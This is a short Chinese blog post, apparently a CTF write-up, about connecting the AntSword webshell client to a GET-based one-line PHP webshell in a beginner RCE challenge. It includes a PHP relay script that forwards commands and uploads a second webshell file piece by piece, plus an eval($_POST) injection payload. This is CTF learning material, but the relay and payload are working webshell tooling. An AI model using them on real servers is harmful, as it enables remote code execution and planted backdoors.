好久没更新博客了,因为有些笔记写得确实难以入目,更多也是因为好久没静下心来学习了,等8月份忙完,会把一些还像人话的笔记整理一下,一起发上来。前天,做到新生赛的一个弱智RCE的时候,看到他本质就是一个一句话木马的时候,想到了用蚁剑去连。但是,里面是用$_GET,传入的密码,蚁剑连上也是空。想了很多弱智方法都连不上。这时,一位甜菜出现了。
只要把POST改为GET请求即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| <?php highlight_file(__FILE__); ini_set('max_execution_time', '100'); // 超时时间
$url = 'http://localhost/test/rce.php'; // 一句话地址 $pass = '2'; // 密码 $data = $_POST['cmd']; // 中转密码
echo file_get_contents($url.'?'.$pass.'='.$data);
if(isset($_GET['upload'])){ $f = fopen('darkshell.php','r'); // 上传文件 while (!feof($f)){ $content = base64_encode(fgetc($f)); $exec = "file_put_contents('anz.php',base64_decode('$content'),FILE_APPEND);"; file_get_contents($url.'?'.$pass.'='.$exec); } echo 'File uploaded successfully'; } ?>
|
当然了,那道题的构造完全也可以是
1
| ?kevin=eval($_POST['k']);
|
直接用蚁剑连,密码k
特此鸣谢,Anz这位甜菜